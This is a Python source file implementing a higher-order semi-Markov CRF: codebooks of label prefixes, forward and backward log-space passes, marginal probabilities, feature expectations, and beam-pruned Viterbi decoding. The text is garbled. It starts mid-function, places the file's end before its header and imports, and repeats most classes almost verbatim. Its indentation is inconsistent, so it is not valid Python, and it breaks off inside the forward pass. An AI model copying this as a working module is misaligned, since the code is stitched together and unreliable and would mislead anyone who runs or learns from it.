if pi == "":
P_len[pi] = 0
P_numchar[pi] = 0
else:
P_len[pi] = len(elems)
P_numchar[pi] = len(pi)
return (P_len, P_elems, P_numchar)
def get_forward_transition(self):
    """Generate the forward transition data structure.

    Main tasks:
        - create a set PY from the product of P and Y sets
        - for each element in PY, determine the longest suffix existing in set P
        - include all this info in :attr:`f_transition` dictionary
    """
    Y_codebook = self.Y_codebook
    P_codebook = self.P_codebook
    P_numchar = self.P_numchar
    Z_numchar = self.Z_numchar
    # pk_y= {}
    # for p in P_codebook:
    #     for y in Y_codebook:
    #         pk_y[(p, y)] = 1
    # cartesian product of the P and Y sets
    pk_y = {(p, y) for p in P_codebook for y in Y_codebook}
    # map every (pk, y) pair to the non-empty P elements that are suffixes
    # of the concatenation pk|y
    pk_y_suffix = {}
    for p in P_codebook:
        if p != "":
            len_p = P_numchar[p]
            for (pk, y) in pk_y:
                ref_str = pk + "|" + y
                # len_ref equals len(ref_str); the +1 accounts for the "|"
                if pk == "":
                    len_ref = Z_numchar[y] + 1
                else:
                    len_ref = P_numchar[pk] + Z_numchar[y] + 1
                start_pos = len_ref - len_p
                if start_pos >= 0:
                    # check suffix relation by comparing trailing characters
                    check = ref_str[start_pos:] == p
                    # check = self.check_suffix(p, ref_str)
                    if check:
                        if (pk, y) in pk_y_suffix:
                            pk_y_suffix[(pk, y)].append(p)
                        else:
                            pk_y_suffix[(pk, y)] = [p]
    # keep only the longest suffix per (pk, y) pair
    pk_y_suffix = self.keep_longest_elems(pk_y_suffix)
    f_transition = {}
    for (pk, y), pi in pk_y_suffix.items():
        # elmkey is the string form of pk|y (just y when pk is empty)
        if pk == "":
            elmkey = y
        else:
            elmkey = pk + "|" + y
        if pi in f_transition:
            f_transition[pi][elmkey] = (pk, y)
        else:
            f_transition[pi] = {elmkey: (pk, y)}
    # print("f_transition ", f_transition)
    return f_transition
def get_pky_codebook(self):
    """Assign a unique integer code to every element of the PY set.

    PY is the product of sets P and Y; its elements are the keys of the
    inner dictionaries of :attr:`f_transition`.
    """
    # flatten the nested dict and enumerate the pky keys in traversal order
    all_pky = (pky for pi in self.f_transition for pky in self.f_transition[pi])
    return {pky: code for code, pky in enumerate(all_pky)}
def map_pky_z(self):
    """Generate a map between elements of the Z set and the PY set."""
    f_transition = self.f_transition
    Z_codebook = self.Z_codebook
    # given that we demand to have a unigram label features then Z set will always contain Y elems
    Z_numchar = self.Z_numchar
    P_numchar = self.P_numchar
    pky_codebook = self.pky_codebook
    P_codebook = self.P_codebook
    # z_pi_piy maps z -> three parallel lists of codes, in the order
    # ([pk codes], [pky codes], [pi codes])
    z_pi_piy = {}
    # z_pky maps z -> list of pky codes for which z is a suffix
    z_pky = {}
    for pi in f_transition:
        for pky, pk_y_tup in f_transition[pi].items():
            pk, y = pk_y_tup
            # get number of characters in the pky
            if pk == "":
                len_pky = Z_numchar[y]
            else:
                # +1 is for the separator '|'
                len_pky = P_numchar[pk] + Z_numchar[y] + 1
            for z in Z_codebook:
                len_z = Z_numchar[z]
                # check suffix relation
                start_pos = len_pky - len_z
                if start_pos >= 0:
                    check = pky[start_pos:] == z
                    if check:
                        pky_c = pky_codebook[pky]
                        pk_c = P_codebook[pk]
                        if z in z_pky:
                            z_pky[z].append(pky_c)
                            z_pi_piy[z][0].append(pk_c)
                            z_pi_piy[z][1].append(pky_c)
                            z_pi_piy[z][2].append(P_codebook[pi])
                        else:
                            z_pky[z] = [pky_c]
                            z_pi_piy[z] = ([pk_c], [pky_c], [P_codebook[pi]])
    return (z_pky, z_pi_piy)
def get_pi_pky_map(self):
    """Build a map between P elements and PY elements.

    For every pi in P, collect (in parallel lists) the codes of the pky
    elements whose longest suffix is pi, together with the codes of their
    pk components.  Used when filling the forward/alpha matrix.
    """
    pi_pky_map = {}
    for pi, transitions in self.f_transition.items():
        pky_codes = []
        pk_codes = []
        for pky, (pk, _y) in transitions.items():
            pky_codes.append(self.pky_codebook[pky])
            pk_codes.append(self.P_codebook[pk])
        pi_pky_map[pi] = [pky_codes, pk_codes]
    return pi_pky_map
def filter_activated_states(
    self, activated_states, accum_active_states, curr_boundary
):
    """Filter/prune states and y features.

    Args:
        activated_states: dictionary containing possible active states/y features;
            it has the form {patt_len: {patt_1, patt_2, ...}}
        accum_active_states: dictionary of only possible active states by position;
            it has the form {pos_1: {state_1, state_2, ...}}
        curr_boundary: tuple (u, v) representing the current boundary in the sequence
    """
    Z_elems = self.Z_elems
    filtered_activestates = {}
    # generate partition boundaries
    depth_node_map = {}
    generate_partitions(
        curr_boundary, self.L, self.max_patt_len, {}, depth_node_map, None
    )
    partition_boundaries = generate_partition_boundaries(depth_node_map)
    for z_len in activated_states:
        # unigram patterns are never filtered here
        if z_len == 1:
            continue
        if z_len in partition_boundaries:
            partitions = partition_boundaries[z_len]
            filtered_activestates[z_len] = set()
            for partition in partitions:
                for z_patt in activated_states[z_len]:
                    check = True
                    zelems = Z_elems[z_patt]
                    # keep the pattern only if each of its labels is active
                    # at the corresponding partition boundary
                    for i in range(z_len):
                        bound = partition[i]
                        if zelems[i] not in accum_active_states[bound]:
                            check = False
                            break
                    if check:
                        filtered_activestates[z_len].add(z_patt)
    return filtered_activestates
class HOSemiCRFAD(LCRF):
"""higher-order semi-CRF model that uses algorithmic differentiation in gradient computation
Args:
model: an instance of :class:`HOSemiCRFADModelRepresentation` class
seqs_representer: an instance of :class:`SeqsRepresenter` class
seqs_info: dictionary holding sequences info
Keyword Arguments:
load_info_fromdisk: integer from 0 to 5 specifying number of cached data
to be kept in memory. 0 means keep everything while
5 means load everything from disk
Attributes:
model: an instance of :class:`HOSemiCRFADModelRepresentation` class
weights: a numpy vector representing feature weights
seqs_representer: an instance of :class:`pyseqlab.feature_extraction.SeqsRepresenter` class
seqs_info: dictionary holding sequences info
beam_size: determines the size of the beam for state pruning
fun_dict: a function map
def_cached_entities: a list of the names of cached entities sorted (descending)
based on estimated space required in memory
"""
def __init__(self, model, seqs_representer, seqs_info, load_info_fromdisk=5):
    # Thin constructor: all initialization is handled by the LCRF base class.
    super().__init__(model, seqs_representer, seqs_info, load_info_fromdisk)
def cached_entitites(self, load_info_fromdisk):
    """Construct the list of names of cached entities kept in memory.

    NOTE: the (mis)spelling "entitites" is inherited from the base-class
    API and kept for compatibility.
    """
    entities = super().cached_entitites(load_info_fromdisk)
    # extend in place, mirroring the original behavior
    entities += ["alpha", "Z", "beta", "fpotential"]
    return entities
def compute_fpotential(self, w, active_features):
    """Compute the potential of active features in a specified boundary.

    Args:
        w: weight vector (numpy vector)
        active_features: dictionary of activated features in a specified boundary

    Returns:
        numpy vector of potentials indexed by pky code.
    """
    model = self.model
    z_pky_map = model.z_pky_map
    f_potential = numpy.zeros(len(model.pky_codebook))
    # to consider caching the w_indx and fval as in cached_pf
    for z, (w_indx, f_val) in active_features.items():
        # weighted sum of the feature values for pattern z
        score = numpy.dot(w[w_indx], f_val)
        # add the score to every pky for which z maintains a suffix relation
        f_potential[z_pky_map[z]] += score
    return f_potential
def compute_forward_vec(self, w, seq_id):
    """Compute the forward matrix (alpha matrix) in log-space.

    Args:
        w: weight vector (numpy vector)
        seq_id: integer representing unique id assigned to the sequence

    .. note::
        activefeatures need to be loaded first in :attr:`seqs_info`
    """
    model = self.model
    pi_pky_map = model.pi_pky_map
    P_len = model.P_len
    P_codebook = model.P_codebook
    T = self.seqs_info[seq_id]["T"]
    L = self.model.L
    activefeatures = self.seqs_info[seq_id]["activefeatures"]
    # alpha[t, pi]: log-sum score of segmentations ending at t in state pi
    alpha = numpy.ones((T + 1, len(P_codebook)), dtype="longdouble") * (-numpy.inf)
    # base case: only the empty prefix is reachable at position 0
    alpha[0, P_codebook[""]] = 0
    fpotential_perboundary = {}
    for j in range(1, T + 1):
        # accumulator[pi, d] holds the contribution of segments of length d+1
        accumulator = (
            numpy.ones((len(P_codebook), L), dtype="longdouble") * -numpy.inf
        )
        for d in range(L):
            u = j - d
            if u <= 0:
                break
            v = j
            f_potential = self.compute_fpotential(w, activefeatures[u, v])
            # cache potentials; backward/marginal computations reuse them
            fpotential_perboundary[u, v] = f_potential
            for pi in pi_pky_map:
                # a prefix of P_len[pi] labels cannot occur before that position
                if j >= P_len[pi]:
                    pi_c = P_codebook[pi]
                    pky_c_list, pk_c_list = pi_pky_map[pi]
                    vec = f_potential[pky_c_list] + alpha[u - 1, pk_c_list]
                    accumulator[pi_c, d] = vectorized_logsumexp(vec)
        for pi in pi_pky_map:
            if j >= P_len[pi]:
                pi_c = P_codebook[pi]
                if L > 1:
                    # combine contributions across all segment lengths
                    alpha[j, pi_c] = vectorized_logsumexp(accumulator[pi_c, :])
                else:
                    alpha[j, pi_c] = accumulator[pi_c, 0]
    self.seqs_info[seq_id]["fpotential"] = fpotential_perboundary
    return alpha
def compute_backward_vec(self, w, seq_id):
    """Compute the backward matrix (beta matrix) in log-space.

    Args:
        w: weight vector (numpy vector) -- not read here; the potentials
            cached by :meth:`compute_forward_vec` are reused instead
        seq_id: integer representing unique id assigned to the sequence

    .. note::
        fpotential per boundary dictionary should be available in :attr:`seqs_info`
    """
    model = self.model
    pi_pky_map = model.pi_pky_map
    P_codebook = model.P_codebook
    len_P = len(P_codebook)
    T = self.seqs_info[seq_id]["T"]
    L = model.L
    fpotential_perboundary = self.seqs_info[seq_id]["fpotential"]
    beta = numpy.ones((T + 2, len(P_codebook)), dtype="longdouble") * (-numpy.inf)
    # base case: every state is an acceptable end state past the last position
    beta[T + 1, :] = 0
    for j in reversed(range(1, T + 1)):
        # accum_mat[pk, d] collects contributions of segments of length d+1
        accum_mat = numpy.ones((len_P, L), dtype="longdouble") * (-numpy.inf)
        for d in range(L):
            # track_comp[pk, pi] holds the score of moving from pk to pi
            track_comp = numpy.ones((len_P, len_P), dtype="longdouble") * (
                -numpy.inf
            )
            u = j
            v = j + d
            if v > T:
                break
            f_potential = fpotential_perboundary[u, v]
            for pi in pi_pky_map:
                pi_c = P_codebook[pi]
                pky_c_list, pk_c_list = pi_pky_map[pi]
                vec = f_potential[pky_c_list] + beta[v + 1, pi_c]
                track_comp[pk_c_list, pi_c] = vec
            for p_c in P_codebook.values():
                accum_mat[p_c, d] = vectorized_logsumexp(track_comp[p_c, :])
        for p_c in P_codebook.values():
            beta[u, p_c] = vectorized_logsumexp(accum_mat[p_c, :])
    return beta
def compute_marginals(self, seq_id):
    """Compute the marginal probability of each y pattern at each position.

    Args:
        seq_id: integer representing unique id assigned to the sequence

    .. note::
        - fpotential per boundary dictionary should be available in :attr:`seqs_info`
        - alpha matrix should be available in :attr:`seqs_info`
        - beta matrix should be available in :attr:`seqs_info`
        - Z (the normalization term, subtracted in log-space below) should be
          available in :attr:`seqs_info`
    """
    model = self.model
    Z_codebook = model.Z_codebook
    z_pi_piy = model.z_pi_piy_map
    T = self.seqs_info[seq_id]["T"]
    L = self.model.L
    alpha = self.seqs_info[seq_id]["alpha"]
    beta = self.seqs_info[seq_id]["beta"]
    Z = self.seqs_info[seq_id]["Z"]
    fpotential_perboundary = self.seqs_info[seq_id]["fpotential"]
    P_marginals = numpy.zeros(
        (L, T + 1, len(self.model.Z_codebook)), dtype="longdouble"
    )
    for j in range(1, T + 1):
        for d in range(L):
            u = j
            v = j + d
            if v > T:
                break
            boundary = (u, v)
            f_potential = fpotential_perboundary[boundary]
            for z in Z_codebook:
                # NOTE(review): per map_pky_z the tuple order is
                # ([pk codes], [pky codes], [pi codes]); the local names
                # below are misleading (pi_c holds pk codes, pk_c holds
                # pi codes) but the arithmetic is consistent with it.
                pi_c, piy_c, pk_c = z_pi_piy[z]
                numerator = (
                    alpha[u - 1, pi_c] + f_potential[piy_c] + beta[v + 1, pk_c]
                )
                P_marginals[d, j, Z_codebook[z]] = numpy.exp(
                    vectorized_logsumexp(numerator) - Z
                )
    return P_marginals
def compute_feature_expectation(self, seq_id, P_marginals, grad):
    """Compute feature expectations (expected counts under the learned model).

    Args:
        seq_id: integer representing unique id assigned to the sequence
        P_marginals: probability matrix for y patterns at each position in time
        grad: numpy vector with dimension equal to the weight vector; updated
            in place with the computed expectations

    .. note::
        activefeatures (per boundary) dictionary should be available in
        :attr:`seqs_info`.
    """
    Z_codebook = self.model.Z_codebook
    activefeatures = self.seqs_info[seq_id]["activefeatures"]
    for (u, v), features_dict in activefeatures.items():
        seg_len = v - u  # zero-based segment-length index into P_marginals
        for z_patt, (w_indx, f_val) in features_dict.items():
            grad[w_indx] += f_val * P_marginals[seg_len, u, Z_codebook[z_patt]]
def prune_states(self, score_vec, beam_size):
    """Prune states that fall off the specified beam size.

    Args:
        score_vec: numpy vector of scores (one per pi state)
        beam_size: size of the beam (integer)

    Returns:
        set of the labels ending the top-``beam_size`` scoring pi states.
    """
    model = self.model
    # argpartition is cheaper than a full argsort for top-k selection.
    # NOTE(review): numpy.argpartition requires beam_size < len(score_vec);
    # callers appear to guarantee this -- confirm if they can ever be equal.
    partitioned = numpy.argpartition(-score_vec, beam_size)
    top_codes = partitioned[:beam_size]
    # decode the top pi states and keep only the last label of each
    return {
        model.P_elems[model.P_codebook_rev[code]][-1] for code in top_codes
    }
def viterbi(self, w, seq_id, beam_size, stop_off_beam=False, y_ref=None, K=1):
    """decode sequences using viterbi decoder

    Args:
        w: weight vector (numpy vector)
        seq_id: integer representing unique id assigned to the sequence
        beam_size: integer representing the size of the beam

    Keyword Arguments:
        stop_off_beam: boolean indicating if to stop when the reference state \
                       falls off the beam (used in perceptron/search based learning)
        y_ref: reference sequence list of labels (used while learning)
        K: integer indicating number of decoded sequences required (i.e. top-k list)
           A* searcher with viterbi will be used to generate k-decoded list
    """
    # fix: the default used to be a mutable `y_ref=[]`; use the None sentinel
    # instead (behavior is identical since y_ref is only read, never mutated)
    if y_ref is None:
        y_ref = []
    model = self.model
    P_elems = model.P_elems
    pi_pky_map = model.pi_pky_map
    P_codebook = model.P_codebook
    P_codebook_rev = model.P_codebook_rev
    L = model.L
    len_P = len(P_codebook)
    num_states = model.num_states
    T = self.seqs_info[seq_id]["T"]
    # records max score at every time step
    delta = numpy.ones((T + 1, len(P_codebook)), dtype="longdouble") * (-numpy.inf)
    pi_mat = numpy.ones((len_P, L), dtype="longdouble") * (-numpy.inf)
    # the score for the empty sequence at time 0 is 1
    delta[0, P_codebook[""]] = 0
    back_track = {}
    # records where violation occurs -- it is 1-based indexing
    viol_index = []
    if beam_size == num_states:
        # case of exact search and decoding
        l = {}
        l["activefeatures"] = (seq_id,)
        self.check_cached_info(seq_id, l)
        active_features = self.seqs_info[seq_id]["activefeatures"]
        for j in range(1, T + 1):
            # reset pi_mat at every loop
            pi_mat.fill(-numpy.inf)
            backpointer = {}
            for d in range(L):
                u = j - d
                if u <= 0:
                    break
                v = j
                boundary = (u, v)
                # vector of size len(pky)
                f_potential = self.compute_fpotential(w, active_features[boundary])
                for pi in pi_pky_map:
                    pi_c = P_codebook[pi]
                    pky_c_list, pk_c_list = pi_pky_map[pi]
                    vec = f_potential[pky_c_list] + delta[u - 1, pk_c_list]
                    # best score/back-pointer for pi with a segment of length d+1
                    pi_mat[pi_c, d] = numpy.max(vec)
                    argmax_indx = numpy.argmax(vec)
                    pk_c_max = pk_c_list[argmax_indx]
                    pk = P_codebook_rev[pk_c_max]
                    y = P_elems[pk][-1]
                    backpointer[d, pi_c] = (pk_c_max, y)
            # get the max for each pi across all segment lengths
            for pi in pi_pky_map:
                pi_c = P_codebook[pi]
                delta[j, pi_c] = numpy.max(pi_mat[pi_c, :])
                argmax_indx = numpy.argmax(pi_mat[pi_c, :])
                pk_c, y = backpointer[argmax_indx, pi_c]
                back_track[j, pi_c] = (argmax_indx, pk_c, y)
    else:
        # case of inexact search and decoding
        l = {}
        l["seg_features"] = (seq_id,)
        self.check_cached_info(seq_id, l)
        # tracks active states by boundary
        accum_activestates = {}
        for j in range(1, T + 1):
            # reset pi_mat at every loop
            pi_mat.fill(-numpy.inf)
            backpointer = {}
            for d in range(L):
                u = j - d
                if u <= 0:
                    break
                v = j
                boundary = (u, v)
                active_features = self.identify_activefeatures(
                    seq_id, boundary, accum_activestates
                )
                # vector of size len(pky)
                f_potential = self.compute_fpotential(w, active_features)
                for pi in pi_pky_map:
                    pi_c = P_codebook[pi]
                    pky_c_list, pk_c_list = pi_pky_map[pi]
                    vec = f_potential[pky_c_list] + delta[u - 1, pk_c_list]
                    pi_mat[pi_c, d] = numpy.max(vec)
                    argmax_indx = numpy.argmax(vec)
                    pk_c_max = pk_c_list[argmax_indx]
                    pk = P_codebook_rev[pk_c_max]
                    y = P_elems[pk][-1]
                    backpointer[d, pi_c] = (pk_c_max, y)
                topk_states = self.prune_states(pi_mat[:, d], beam_size)
                # update tracked active states -- to consider renaming it
                accum_activestates[boundary] = accum_activestates[
                    boundary
                ].intersection(topk_states)
            # get the max for each pi across all segment lengths
            for pi in pi_pky_map:
                pi_c = P_codebook[pi]
                delta[j, pi_c] = numpy.max(pi_mat[pi_c, :])
                argmax_indx = numpy.argmax(pi_mat[pi_c, :])
                pk_c, y = backpointer[argmax_indx, pi_c]
                back_track[j, pi_c] = (argmax_indx, pk_c, y)
            # in case we are using viterbi for learning
            if y_ref:
                topk_states = self.prune_states(delta[j, :], beam_size)
                if y_ref[j - 1] not in topk_states:
                    viol_index.append(j)
                    if stop_off_beam:
                        T = j
                        break
    if K == 1:
        # decoding the sequence
        Y_decoded = []
        p_T_c = numpy.argmax(delta[T, :])
        p_T = P_codebook_rev[p_T_c]
        y_T = P_elems[p_T][-1]
        d, pt_c, yt = back_track[T, p_T_c]
        # emit the last segment (length d+1), then walk the back-pointers
        for _ in range(d + 1):
            Y_decoded.append(y_T)
        t = T - d - 1
        while t > 0:
            new_d, new_pt_c, new_yt = back_track[t, pt_c]
            for _ in range(new_d + 1):
                Y_decoded.append(yt)
            t = t - new_d - 1
            pt_c = new_pt_c
            yt = new_yt
        Y_decoded.reverse()
        # print("y_decoded ", Y_decoded)
        return (Y_decoded, viol_index)
    else:
        # use the A* searcher on top of viterbi matrices to produce top-K lists
        asearcher = HOSemi_AStarSearcher(P_codebook_rev, P_elems)
        topK = asearcher.search(delta, back_track, T, K)
        # print('topk ', topK)
        return (topK, viol_index)
if __name__ == "__main__":
pass
# (removed stray "|" artifact left over from file concatenation; it was invalid Python)
"""
@author: <NAME> <<EMAIL>>
"""
import numpy
from .linear_chain_crf import LCRFModelRepresentation, LCRF
from .utilities import (
HOSemi_AStarSearcher,
vectorized_logsumexp,
generate_partitions,
generate_partition_boundaries,
)
class HOSemiCRFADModelRepresentation(LCRFModelRepresentation):
r"""Model representation that will hold data structures to be used in :class:`HOSemiCRF` class
Attributes:
P_codebook: set of proper prefixes of the elements in the set of patterns :attr:`Z_codebook`
e.g. {'':0, 'P':1, 'L':2, 'O':3, 'L|O':4, ...}
P_codebook_rev: reversed codebook of :attr:`P_codebook`
e.g. {0:'', 1:'P', 2:'L', 3:'O', 4:'L|O', ...}
P_len: dictionary comprising the length (i.e. number of elements) of elements in :attr:`P_codebook`
e.g. {'':0, 'P':1, 'L':1, 'O':1, 'L|O':2, ...}
P_elems: dictionary comprising the composing elements of every prefix in :attr:`P_codebook`
e.g. {'':('',), 'P':('P',), 'L':('L',), 'O':('O',), 'L|O':('L','O'), ...}
P_numchar: dictionary comprising the number of characters for every prefix in :attr:`P_codebook`
e.g. {'':0, 'P':1, 'L':1, 'O':1, 'L|O':3, ...}
f_transition: a dictionary representing forward transition data structure having the form:
{pi:{pky, (pk, y)}} where pi represents the longest prefix element in :attr:`P_codebook`
for pky (representing the concatenation of elements in :attr:`P_codebook` and :attr:`Y_codebook`)
pky_codebook: generate a codebook for the elements of the set PY (the product of set P and Y)
pi_pky_map: a map between P elements and PY elements
z_pky_map: a map between elements of the Z set and PY set
it has the form/template {ypattern:[pky_elements]}
z_pi_piy_map: a map between elements of the Z set and PY set
it has the form/template {ypattern:(pk, pky, pi)}
"""
def __init__(self):
# call super class
super().__init__()
self.P_codebook = None
self.P_codebook_rev = None
self.P_len = None
self.P_elems = None
self.P_numchar = None
self.f_transition = None
self.pky_codebook = None
self.pi_pky_map = None
self.z_pky_map = None
self.z_pi_piy_map = None
def setup_model(self, modelfeatures, states, L):
    """Set up and create the model representation.

    Creates all maps and codebooks needed by the :class:`HOSemiCRFAD` class.

    Args:
        modelfeatures: set of features defining the model
        states: set of states (i.e. tags)
        L: length of longest segment
    """
    # Pure delegation: base-class construction; this subclass builds its own
    # maps later in generate_instance_properties().
    super().setup_model(modelfeatures, states, L)
def generate_instance_properties(self):
    """Generate instance properties that will be later used by :class:`HOSemiCRFAD` class."""
    super().generate_instance_properties()
    # NOTE: order matters -- each map below depends on ones built before it
    # (e.g. get_pi_pky_map() and map_pky_z() read self.pky_codebook).
    self.P_codebook = self.get_forward_states()
    self.P_codebook_rev = self.get_P_codebook_rev()
    self.P_len, self.P_elems, self.P_numchar = self.get_P_info()
    self.f_transition = self.get_forward_transition()
    self.pky_codebook = self.get_pky_codebook()
    self.pi_pky_map = self.get_pi_pky_map()
    self.z_pky_map, self.z_pi_piy_map = self.map_pky_z()
def get_forward_states(self):
    """Build the set of forward states (set P) and assign each a unique code.

    P is the set of proper prefixes of the elements of :attr:`Z_codebook`,
    augmented with every single label and the empty string.
    """
    # Use a dict (not a set) so insertion order is preserved and the
    # generated codes are deterministic.
    prefixes = {}
    for z_patt, labels in self.Z_elems.items():
        # all proper prefixes of the pattern (excluding the full pattern)
        for i in range(self.Z_len[z_patt] - 1):
            prefixes["|".join(labels[: i + 1])] = 1
    # every single label is itself a valid forward state
    for y in self.Y_codebook:
        prefixes[y] = 1
    # the empty element (start state)
    prefixes[""] = 1
    return {state: code for code, state in enumerate(prefixes)}
def get_P_codebook_rev(self):
    """Return the inverse mapping of :attr:`P_codebook` (code -> prefix)."""
    return {code: prefix for prefix, code in self.P_codebook.items()}
def get_P_info(self):
    """Compute properties of the P set (proper prefixes).

    Returns:
        tuple of three dicts keyed by prefix:
        (number of labels, list of composing labels, number of characters).
    """
    lengths, elements, numchars = {}, {}, {}
    for prefix in self.P_codebook:
        parts = prefix.split("|")
        elements[prefix] = parts
        # the empty prefix has zero labels/characters by convention
        is_empty = prefix == ""
        lengths[prefix] = 0 if is_empty else len(parts)
        numchars[prefix] = 0 if is_empty else len(prefix)
    return (lengths, elements, numchars)
def get_forward_transition(self):
    """Generate the forward transition data structure.

    Main tasks:
        - create a set PY from the product of P and Y sets
        - for each element in PY, determine the longest suffix existing in set P
        - include all this info in :attr:`f_transition` dictionary
    """
    Y_codebook = self.Y_codebook
    P_codebook = self.P_codebook
    P_numchar = self.P_numchar
    Z_numchar = self.Z_numchar
    # pk_y= {}
    # for p in P_codebook:
    #     for y in Y_codebook:
    #         pk_y[(p, y)] = 1
    # cartesian product of the P and Y sets
    pk_y = {(p, y) for p in P_codebook for y in Y_codebook}
    # map every (pk, y) pair to the non-empty P elements that are suffixes
    # of the concatenation pk|y
    pk_y_suffix = {}
    for p in P_codebook:
        if p != "":
            len_p = P_numchar[p]
            for (pk, y) in pk_y:
                ref_str = pk + "|" + y
                # len_ref equals len(ref_str); the +1 accounts for the "|"
                if pk == "":
                    len_ref = Z_numchar[y] + 1
                else:
                    len_ref = P_numchar[pk] + Z_numchar[y] + 1
                start_pos = len_ref - len_p
                if start_pos >= 0:
                    # check suffix relation by comparing trailing characters
                    check = ref_str[start_pos:] == p
                    # check = self.check_suffix(p, ref_str)
                    if check:
                        if (pk, y) in pk_y_suffix:
                            pk_y_suffix[(pk, y)].append(p)
                        else:
                            pk_y_suffix[(pk, y)] = [p]
    # keep only the longest suffix per (pk, y) pair
    pk_y_suffix = self.keep_longest_elems(pk_y_suffix)
    f_transition = {}
    for (pk, y), pi in pk_y_suffix.items():
        # elmkey is the string form of pk|y (just y when pk is empty)
        if pk == "":
            elmkey = y
        else:
            elmkey = pk + "|" + y
        if pi in f_transition:
            f_transition[pi][elmkey] = (pk, y)
        else:
            f_transition[pi] = {elmkey: (pk, y)}
    # print("f_transition ", f_transition)
    return f_transition
def get_pky_codebook(self):
    """Assign a unique integer code to every element of the PY set.

    PY is the product of sets P and Y; its elements are the keys of the
    inner dictionaries of :attr:`f_transition`.
    """
    # flatten the nested dict and enumerate the pky keys in traversal order
    all_pky = (pky for pi in self.f_transition for pky in self.f_transition[pi])
    return {pky: code for code, pky in enumerate(all_pky)}
def map_pky_z(self):
    """Generate a map between elements of the Z set and the PY set."""
    f_transition = self.f_transition
    Z_codebook = self.Z_codebook
    # given that we demand to have a unigram label features then Z set will always contain Y elems
    Z_numchar = self.Z_numchar
    P_numchar = self.P_numchar
    pky_codebook = self.pky_codebook
    P_codebook = self.P_codebook
    # z_pi_piy maps z -> three parallel lists of codes, in the order
    # ([pk codes], [pky codes], [pi codes])
    z_pi_piy = {}
    # z_pky maps z -> list of pky codes for which z is a suffix
    z_pky = {}
    for pi in f_transition:
        for pky, pk_y_tup in f_transition[pi].items():
            pk, y = pk_y_tup
            # get number of characters in the pky
            if pk == "":
                len_pky = Z_numchar[y]
            else:
                # +1 is for the separator '|'
                len_pky = P_numchar[pk] + Z_numchar[y] + 1
            for z in Z_codebook:
                len_z = Z_numchar[z]
                # check suffix relation
                start_pos = len_pky - len_z
                if start_pos >= 0:
                    check = pky[start_pos:] == z
                    if check:
                        pky_c = pky_codebook[pky]
                        pk_c = P_codebook[pk]
                        if z in z_pky:
                            z_pky[z].append(pky_c)
                            z_pi_piy[z][0].append(pk_c)
                            z_pi_piy[z][1].append(pky_c)
                            z_pi_piy[z][2].append(P_codebook[pi])
                        else:
                            z_pky[z] = [pky_c]
                            z_pi_piy[z] = ([pk_c], [pky_c], [P_codebook[pi]])
    return (z_pky, z_pi_piy)
def get_pi_pky_map(self):
    """Build a map between P elements and PY elements.

    For every pi in P, collect (in parallel lists) the codes of the pky
    elements whose longest suffix is pi, together with the codes of their
    pk components.  Used when filling the forward/alpha matrix.
    """
    pi_pky_map = {}
    for pi, transitions in self.f_transition.items():
        pky_codes = []
        pk_codes = []
        for pky, (pk, _y) in transitions.items():
            pky_codes.append(self.pky_codebook[pky])
            pk_codes.append(self.P_codebook[pk])
        pi_pky_map[pi] = [pky_codes, pk_codes]
    return pi_pky_map
def filter_activated_states(
    self, activated_states, accum_active_states, curr_boundary
):
    """Filter/prune states and y features.

    Args:
        activated_states: dictionary containing possible active states/y features;
            it has the form {patt_len: {patt_1, patt_2, ...}}
        accum_active_states: dictionary of only possible active states by position;
            it has the form {pos_1: {state_1, state_2, ...}}
        curr_boundary: tuple (u, v) representing the current boundary in the sequence
    """
    Z_elems = self.Z_elems
    filtered_activestates = {}
    # generate partition boundaries
    depth_node_map = {}
    generate_partitions(
        curr_boundary, self.L, self.max_patt_len, {}, depth_node_map, None
    )
    partition_boundaries = generate_partition_boundaries(depth_node_map)
    for z_len in activated_states:
        # unigram patterns are never filtered here
        if z_len == 1:
            continue
        if z_len in partition_boundaries:
            partitions = partition_boundaries[z_len]
            filtered_activestates[z_len] = set()
            for partition in partitions:
                for z_patt in activated_states[z_len]:
                    check = True
                    zelems = Z_elems[z_patt]
                    # keep the pattern only if each of its labels is active
                    # at the corresponding partition boundary
                    for i in range(z_len):
                        bound = partition[i]
                        if zelems[i] not in accum_active_states[bound]:
                            check = False
                            break
                    if check:
                        filtered_activestates[z_len].add(z_patt)
    return filtered_activestates
class HOSemiCRFAD(LCRF):
"""higher-order semi-CRF model that uses algorithmic differentiation in gradient computation
Args:
model: an instance of :class:`HOSemiCRFADModelRepresentation` class
seqs_representer: an instance of :class:`SeqsRepresenter` class
seqs_info: dictionary holding sequences info
Keyword Arguments:
load_info_fromdisk: integer from 0 to 5 specifying number of cached data
to be kept in memory. 0 means keep everything while
5 means load everything from disk
Attributes:
model: an instance of :class:`HOSemiCRFADModelRepresentation` class
weights: a numpy vector representing feature weights
seqs_representer: an instance of :class:`pyseqlab.feature_extraction.SeqsRepresenter` class
seqs_info: dictionary holding sequences info
beam_size: determines the size of the beam for state pruning
fun_dict: a function map
def_cached_entities: a list of the names of cached entities sorted (descending)
based on estimated space required in memory
"""
def __init__(self, model, seqs_representer, seqs_info, load_info_fromdisk=5):
    # Thin constructor: all initialization is handled by the LCRF base class.
    super().__init__(model, seqs_representer, seqs_info, load_info_fromdisk)
def cached_entitites(self, load_info_fromdisk):
    """Construct the list of names of cached entities kept in memory.

    NOTE: the (mis)spelling "entitites" is inherited from the base-class
    API and kept for compatibility.
    """
    entities = super().cached_entitites(load_info_fromdisk)
    # extend in place, mirroring the original behavior
    entities += ["alpha", "Z", "beta", "fpotential"]
    return entities
def compute_fpotential(self, w, active_features):
    """Compute the potential of active features in a specified boundary.

    Args:
        w: weight vector (numpy vector)
        active_features: dictionary of activated features in a specified boundary

    Returns:
        numpy vector of potentials indexed by pky code.
    """
    model = self.model
    z_pky_map = model.z_pky_map
    f_potential = numpy.zeros(len(model.pky_codebook))
    # to consider caching the w_indx and fval as in cached_pf
    for z, (w_indx, f_val) in active_features.items():
        # weighted sum of the feature values for pattern z
        score = numpy.dot(w[w_indx], f_val)
        # add the score to every pky for which z maintains a suffix relation
        f_potential[z_pky_map[z]] += score
    return f_potential
def compute_forward_vec(self, w, seq_id):
    """Compute the forward matrix (alpha matrix) in log-space.

    Args:
        w: weight vector (numpy vector)
        seq_id: integer representing unique id assigned to the sequence

    .. note::
        activefeatures need to be loaded first in :attr:`seqs_info`
    """
    model = self.model
    pi_pky_map = model.pi_pky_map
    P_len = model.P_len
    P_codebook = model.P_codebook
    T = self.seqs_info[seq_id]["T"]
    L = self.model.L
    activefeatures = self.seqs_info[seq_id]["activefeatures"]
    # alpha[t, pi]: log-sum score of segmentations ending at t in state pi
